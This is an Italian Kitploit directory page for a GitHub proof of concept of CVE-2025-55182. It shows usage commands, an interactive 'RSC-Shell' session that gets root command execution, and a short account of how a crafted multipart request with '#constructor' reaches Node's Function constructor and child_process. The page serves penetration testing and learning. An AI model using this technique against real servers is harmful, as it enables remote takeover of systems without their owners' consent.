Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-PoC — Poc per CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

Poc per CVE-2025-55182

Vedi Repository
19 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182-PoC

PoC per CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Dichiarazione di non responsabilità legale

Questo strumento è fornito solo per scopi educativi e test di sicurezza autorizzati. L'utilizzo di questo strumento per attaccare bersagli senza previo consenso reciproco è illegale. Lo sviluppatore non si assume alcuna responsabilità e non è responsabile per qualsiasi uso improprio o danno causato da questo programma.

Requisiti

pip install requests

Utilizzo

Puoi eseguire lo strumento in tre modalità: Check, Exploit o Shell interattiva.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Esempio

Scarica lo strumento
root@kitploit:~
python3 poc.py -u http://target-site.com --check

Esecuzione di un singolo comando

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Modalità Shell Interattiva

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

Come funziona

Il Check: invia una richiesta multipart definendo {} all'indice 1 e tenta di accedere a ["$1🅰️a"]. I server non patchati vanno in crash (HTTP 500) tentando di accedere alla proprietà a di undefined. I server patchati rispondono con HTTP 200.

L'Exploit: invia una richiesta multipart che fa riferimento all'Action ID valido, ma aggiunge #constructor. Questo inganna il serializzatore facendogli restituire il costruttore Function, permettendoci di passare JavaScript arbitrario (child_process di Node.js) da eseguire sul server.